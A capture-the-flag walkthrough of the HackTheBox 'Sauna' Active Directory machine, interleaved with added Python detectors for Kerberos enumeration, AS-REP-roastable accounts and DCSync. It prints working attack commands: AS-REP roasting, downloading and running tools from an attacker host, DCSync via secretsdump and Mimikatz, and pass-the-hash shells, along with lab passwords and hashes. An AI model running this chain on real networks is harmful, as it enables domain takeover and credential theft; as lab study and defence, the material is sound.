Sauna #3 AD
Reconnaissance:
NMAP:
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.175
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-24 11:27:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-12-24T11:28:36
|_ start_date: N/A
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.175
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.175
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-24 11:43:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49746/tcp open msrpc Microsoft Windows RPC
49775/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-12-24T11:44:50
|_ start_date: N/A
|_clock-skew: 6h59m59s
The IIS server version suggests this is a Windows 10 / Server 2016 / Server 2019 machine. The LDAP scripts show a domain name of EGOTISTICAL-BANK.LOCAL0. I’ll explore that more.
Enumeration: Website - TCP 80
The page represents a bank: http://10.10.10.175/
Just scrolling around, nothing interesting jumps out. All the pages are static, and the forms don’t work. There isn’t much of value here. On the “About Us” page, there’s a list of the team, which can be used to build a list of candidate usernames. I applied the common account-naming patterns (first.last, first-initial + last, first + last-initial) to those names to create a list for further attacks:
fergus.smith
shau.coins
hugo.bear
bowie.taylor
sophie.driver
steve.kerb
fsmith
scoins
hbear
btaylor
sdriver
skerb
ferguss
shaunc
hugob
bowiet
sophied
stevek
While this list was created manually, you could use the namemash.py script, which generates a list of possible usernames from a person’s first and last name:
https://gist.github.com/superkojiman/11076951
Also, in a real-world scenario, a site like https://hunter.io can help you find the valid email pattern for a specific target.
Directory Brute Force:
While looking at the site, I also had gobuster running, but it didn’t find anything interesting either:
┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.175/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
[+] Url: http://10.10.10.175/
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 150] [--> http://10.10.10.175/images/]
/Images (Status: 301) [Size: 150] [--> http://10.10.10.175/Images/]
/css (Status: 301) [Size: 147] [--> http://10.10.10.175/css/]
/fonts (Status: 301) [Size: 149] [--> http://10.10.10.175/fonts/]
/IMAGES (Status: 301) [Size: 150] [--> http://10.10.10.175/IMAGES/]
/Fonts (Status: 301) [Size: 149] [--> http://10.10.10.175/Fonts/]
/CSS (Status: 301) [Size: 147] [--> http://10.10.10.175/CSS/]
Enumeration: SMB - TCP 445
I’ll try anonymous connections to the SMB shares, but no love:
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.175
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied}
┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Enumeration: LDAP - TCP/UDP 389
The nmap script did some basic enumeration and returned the domain EGOTISTICAL-BANK.LOCAL0. I’ll dig in a bit more with ldapsearch.
First, the query to get the domain base is ldapsearch -x -h 10.10.10.175 -s base namingcontexts, where:
-x - simple authentication (an anonymous bind here, since no -D is given)
-h 10.10.10.175 - host to query (newer OpenLDAP clients drop -h in favour of -H ldap://10.10.10.175, which is the form used below)
-s base - set the scope to base
namingcontexts - return the naming contexts
This gives the domain, EGOTISTICAL-BANK.LOCAL, which I then use as the base DN (-b) for a full anonymous search:
┌──(kali💀kali)-[~/Desktop]
└─$ ldapsearch -x -H ldap://10.10.10.175 -b "dc=Egotistical-bank,dc=local"
# EGOTISTICAL-BANK.LOCAL
# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
There’s a bunch of information there, but I didn’t end up using it.
Enumeration: DNS - TCP/UDP 53
Any time I see DNS, it’s worth trying a zone transfer. Both sauna.htb and egotistical-bank.local failed to return anything:
┌──(kali💀kali)-[~/Desktop]
└─$ dig axfr @10.10.10.175 sauna.htb
; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr @10.10.10.175 sauna.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
┌──(kali💀kali)-[~/Desktop]
└─$ dig axfr @10.10.10.175 egotistical-bank.local
; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr @10.10.10.175 egotistical-bank.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
Enumeration: Kerberos - UDP (and TCP) 88
Without creds, one thing I can check on Kerberos is brute-forcing usernames. I’ll use Kerbrute to give this a run, and it finds four unique usernames:
kerbrute.py userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
I used a list of usernames from SecLists for the brute-force to see if anything came out before trying to convert the names from the team page into a username format. In a CTF, it makes sense to try a broad list first, since it’s easier and noise doesn’t matter. If this were a real company, I’d probably try variations of the names, or look on social media to find a corporate email address for an employee and learn the username format first.
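From the defender’s side, a Kerbrute run like this is loud on the DC: every probe is an AS-REQ, logged as event 4768, and names that do not exist fail with status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). The following is an added example (my own code, not part of the writeup or of Kerbrute) that flags the pattern; the log lines, their key=value layout and the 10.10.14.3 address are constructed.

```python
# Added example: detect Kerberos username enumeration in DC security logs.
# One source address producing many distinct 0x6 failures on event 4768 in a
# short window is the signature. The sample log lines are constructed.
import re
from collections import defaultdict
from datetime import datetime, timedelta

FIELD_RE = re.compile(r"(\w+)=(\S+)")

SAMPLE_4768 = """\
2023-12-24T11:43:50 EventID=4768 TargetUserName=fsmith IpAddress=10.10.14.3 Status=0x0
2023-12-24T11:43:55 EventID=4768 TargetUserName=fsmth IpAddress=10.10.14.3 Status=0x6
2023-12-24T11:44:01 EventID=4768 TargetUserName=aaron IpAddress=10.10.16.4 Status=0x6
2023-12-24T11:44:01 EventID=4768 TargetUserName=abby IpAddress=10.10.16.4 Status=0x6
2023-12-24T11:44:02 EventID=4768 TargetUserName=adam IpAddress=10.10.16.4 Status=0x6
2023-12-24T11:44:02 EventID=4768 TargetUserName=admin IpAddress=10.10.16.4 Status=0x6
2023-12-24T11:44:03 EventID=4768 TargetUserName=alex IpAddress=10.10.16.4 Status=0x6
2023-12-24T11:44:03 EventID=4768 TargetUserName=alex IpAddress=10.10.16.4 Status=0x6
2023-12-24T11:44:04 EventID=4768 TargetUserName=amy IpAddress=10.10.16.4 Status=0x6
"""

def parse_event(line):
    """Split 'timestamp key=value ...' into a dict with a parsed time."""
    ts, rest = line.split(" ", 1)
    ev = dict(FIELD_RE.findall(rest))
    ev["time"] = datetime.fromisoformat(ts)
    return ev

def detect_user_enum(log_text, window_s=60, min_unknown=5):
    """Return {source_ip: distinct_unknown_names} for every source that sent
    AS-REQs for at least min_unknown different non-existent principals inside
    any window_s-second window. Repeats of one name (a retried typo) count once."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev.get("EventID") == "4768" and ev.get("Status") == "0x6":
            by_src[ev["IpAddress"]].append((ev["time"], ev["TargetUserName"]))
    alerts = {}
    window = timedelta(seconds=window_s)
    for src, probes in by_src.items():
        probes.sort()
        for i, (t0, _) in enumerate(probes):
            names = {name for t, name in probes[i:] if t - t0 <= window}
            if len(names) >= min_unknown:
                alerts[src] = max(alerts.get(src, 0), len(names))
    return alerts

if __name__ == "__main__":
    print(detect_user_enum(SAMPLE_4768))   # {'10.10.16.4': 6}
```

The single typo from 10.10.14.3 stays below the threshold, while the six distinct unknown names from the scanning host in four seconds are reported.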
Shell as fsmith
AS-REP Roasting: m0chan has a great post on attacking Kerberos that includes AS-REP Roasting. Normally, when a client asks the KDC for a ticket, it first has to prove it knows the account’s key (pre-authentication) before the DC will answer. But there is a per-account option, DONT_REQ_PREAUTH, where the DC skips that step and hands an AS-REP to anyone who asks for that user. Part of that reply is encrypted with a key derived from the user’s password, so it can be cracked offline like a hash. AS-REP Roasting is checking whether any known users happen to have this option set.
Get Hash: I’ll use the list of users I collected from Kerbrute, and run GetNPUsers.py to look for vulnerable users. Three come back as not vulnerable, but one gives a hash:
┌──(kali💀kali)-[~/Desktop]
└─$ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:6a02f4f4365fe83193c8661a4abfdb69$...
Crack Hash: Now I just need to kick this over to hashcat for cracking, and it works:
┌──(kali💀kali)-[~/Desktop]
└─$ hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
┌──(kali💀kali)-[~/Desktop]
└─$ john hashes.aspreroast -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:13 DONE (2023-12-24 02:37) 0.07267g/s 765897p/s 765897c/s 765897C/s Thing..Thereisnospoon
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
It returns the password, Thestrokes23.
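The fix on the AD side is to find every account with DONT_REQ_PREAUTH set and clear it. Here is an added example (my own code, not from the writeup) that does that audit from userAccountControl values and also parses a $krb5asrep$ line of the kind GetNPUsers.py wrote above, so an incident responder can tell which account to reset; the user entries are constructed samples, while the two flag constants are the real userAccountControl bits.

```python
# Added example: audit AS-REP roastable accounts and parse a roast hash line.
# The sample user entries are constructed; the flag values are real.
import re

UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"

# Constructed (sAMAccountName, userAccountControl) pairs, as an LDAP search
# for (objectClass=user) returning userAccountControl would give them.
SAMPLE_USERS = [
    ("Administrator", 0x10200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("fsmith", 0x410200),         # ... | DONT_REQUIRE_PREAUTH: roastable
    ("hsmith", 0x10200),
    ("oldsvc", 0x400202),         # DONT_REQUIRE_PREAUTH but ACCOUNTDISABLE
]

def asrep_roastable(users):
    """Return (enabled, disabled) lists of accounts with DONT_REQUIRE_PREAUTH
    set. Disabled ones cannot be roasted today, but the flag should still be
    cleared so re-enabling the account does not quietly reopen the hole."""
    enabled, disabled = [], []
    for name, uac in users:
        if uac & UF_DONT_REQUIRE_PREAUTH:
            (disabled if uac & UF_ACCOUNTDISABLE else enabled).append(name)
    return enabled, disabled

# hashcat -m 18200 layout:
# $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum hex>$<encrypted part hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

def parse_asrep_hash(line):
    """Parse one roast hash line into its fields, or return None if it is not
    one. etype 23 is RC4-HMAC: the reply is keyed by the NT hash, which is
    why a wordlist cracks it so quickly; AES etypes (17/18) are far slower."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    return {"user": m["user"], "realm": m["realm"],
            "etype": int(m["etype"]), "rc4": m["etype"] == "23"}
```

Disabling RC4 for the affected accounts (so only AES etypes are issued) raises the cracking cost, but removing the pre-authentication exemption is the actual fix.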
Evil-WinRM: If I didn’t already have Evil-WinRM installed, I could install it with gem install evil-winrm. Now I’ll use it to get a shell:
┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
d1e121---------------------------
Priv Esc: fsmith –> svc_loanmgr
First, I grabbed a list of all the domain users with the following command:
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
Moving on to current user privileges…
*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Looks like I do not have permission to run systeminfo.exe.
*Evil-WinRM* PS C:\Users\FSmith\Desktop> systeminfo
Program 'systeminfo.exe' failed to run: Access is denied
At line:1 char:1
WinPEAS: For Windows enumeration, I’ll run WinPEAS.exe from the Privilege Escalation Awesome Scripts Suite.
PS SHARE:
┌──(kali💀kali)-[~]
└─$ python -m SimpleHTTPServer 5555
*Evil-WinRM* PS C:\Users\FSmith\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/winPEASx64.exe', 'C:\Users\FSmith\Desktop\winPEASx64.exe')
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ./winPEASx64.exe
In looking through the results, AutoLogon credentials jumped out as interesting:
[+] Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Evil-WinRM: Running net user on the box earlier showed there was no user svc_loanmanager, but there is svc_loanmgr, and the AutoLogon password works for that account:
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
Priv Esc: svc_loanmgr –> root
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> systeminfo
Program 'systeminfo.exe' failed to run: Access is denied
At line:1 char:1
I ran winPEAS.exe again, but nothing new jumped out at me. Since there’s AD stuff going on, I went to Bloodhound.
┌──(kali💀kali)-[~]
└─$ python -m SimpleHTTPServer 5555
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/winPEASx64.exe', 'C:\Users\svc_loanmgr\Desktop\winPEASx64.exe')
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> ./winPEASx64.exe
SharpHound:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:5555/SharpHound.exe', 'C:\Users\svc_loanmgr\Documents\SharpHound.exe')
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> ./SharpHound.exe -c DCOnly -d EGOTISTICAL-BANK.LOCAL --ldapusername svc_loanmgr --ldappassword 'Moneymakestheworldgoround!'
Bloodhound:
┌──(kali💀kali)-[~]
└─$ sudo neo4j console
Then open http://localhost:7474/browser/ and log in with the default credentials (username neo4j, password neo4j).
DCSync via secretsdump: My preferred way to do a DCSync attack is secretsdump.py, which lets me run the attack from my Kali box, provided I can talk to the DC on TCP 445 and 135 and a high RPC port. This avoids fighting with AV, though it does create network traffic. It only works because svc_loanmgr holds the domain replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which is what BloodHound flags for this account.
I need to give it just a target string in the format [username]:[password]@[ip]:
┌──(kali💀kali)-[~]
└─$ secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:fbb859fe3d5cc033ebfaac09e9d1dbaa:::
[*] Kerberos keys grabbed
Mimikatz: I can also use Mimikatz like BloodHound suggested. I’ll download the latest release from the release page, and upload the 64-bit binary to Sauna:
upload /opt/mimikatz/x64/mimikatz.exe
Mimikatz can be super finicky. Ideally I can run it and drop to a Mimikatz shell, but for some reason on Sauna it just started spitting the prompt at me repeatedly and I had to kill my session. It’s always safer to run mimikatz.exe with the commands you want to run following it on the command line:
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
This spits out a ton of information. The hash I need (the one that matches the secretsdump output) is the Hash NTLM field in the middle of that output. I could also use /all instead of /user:administrator to dump every account, but administrator is all I need here.
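Both the secretsdump.py and the Mimikatz variants reach the DC as the same DRSUAPI replication call, and with “Audit Directory Service Access” enabled the DC records it as event 4662 on the domain object with Access Mask 0x100 and the replication right GUIDs in Properties. The following is an added example (my own code, not from the writeup) that flags such events from a non-DC principal; the log lines, their key=value layout and the DC02$ partner account are constructed, while the three GUIDs are the real Active Directory extended-right identifiers.

```python
# Added example: detect DCSync in DC security logs via event 4662.
# Real DCs replicate the same way, so known DC machine accounts are excluded.
# The sample log lines and the DC02$ account are constructed.
import re

FIELD_RE = re.compile(r"(\w+)=(\S+)")

# Extended rights a DCSync exercises (well-known Active Directory GUIDs).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

SAMPLE_4662 = """\
EventID=4662 SubjectUserName=DC02$ ObjectType=domainDNS AccessMask=0x100 Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=svc_loanmgr ObjectType=domainDNS AccessMask=0x100 Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=fsmith ObjectType=user AccessMask=0x10 Properties=00000000-0000-0000-0000-000000000000
EventID=4624 SubjectUserName=svc_loanmgr LogonType=3
"""

def detect_dcsync(log_text, dc_accounts):
    """Return [(subject, [right names])] for each 4662 event in which a
    principal other than a known DC machine account exercised a replication
    control-access right. The '-All' right is what exposes password hashes."""
    known_dcs = {a.upper() for a in dc_accounts}
    hits = []
    for line in log_text.splitlines():
        ev = dict(FIELD_RE.findall(line))
        if ev.get("EventID") != "4662" or ev.get("AccessMask") != "0x100":
            continue
        guids = ev.get("Properties", "").lower().split(";")
        rights = [REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS]
        subject = ev.get("SubjectUserName", "")
        if rights and subject.upper() not in known_dcs:
            hits.append((subject, rights))
    return hits

if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_4662, {"DC02$"}):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

The same GUIDs are what to look for in the domain object’s ACL when auditing who can replicate; any non-DC principal holding them is a DCSync path like the one svc_loanmgr has here.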
Shells:
WMI: I can use the administrator NT hash with wmiexec.py (pass-the-hash) to get a shell as administrator:
┌──(kali💀kali)-[~]
└─$ wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175
C:\>whoami
egotisticalbank\administrator
PSExec: Or PSExec to get a shell as SYSTEM:
┌──(kali💀kali)-[~]
└─$ psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175
C:\Windows\system32>whoami
nt authority\system
EvilWinRM: Or I can even use EvilWinRM:
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
e3aa90------------------------------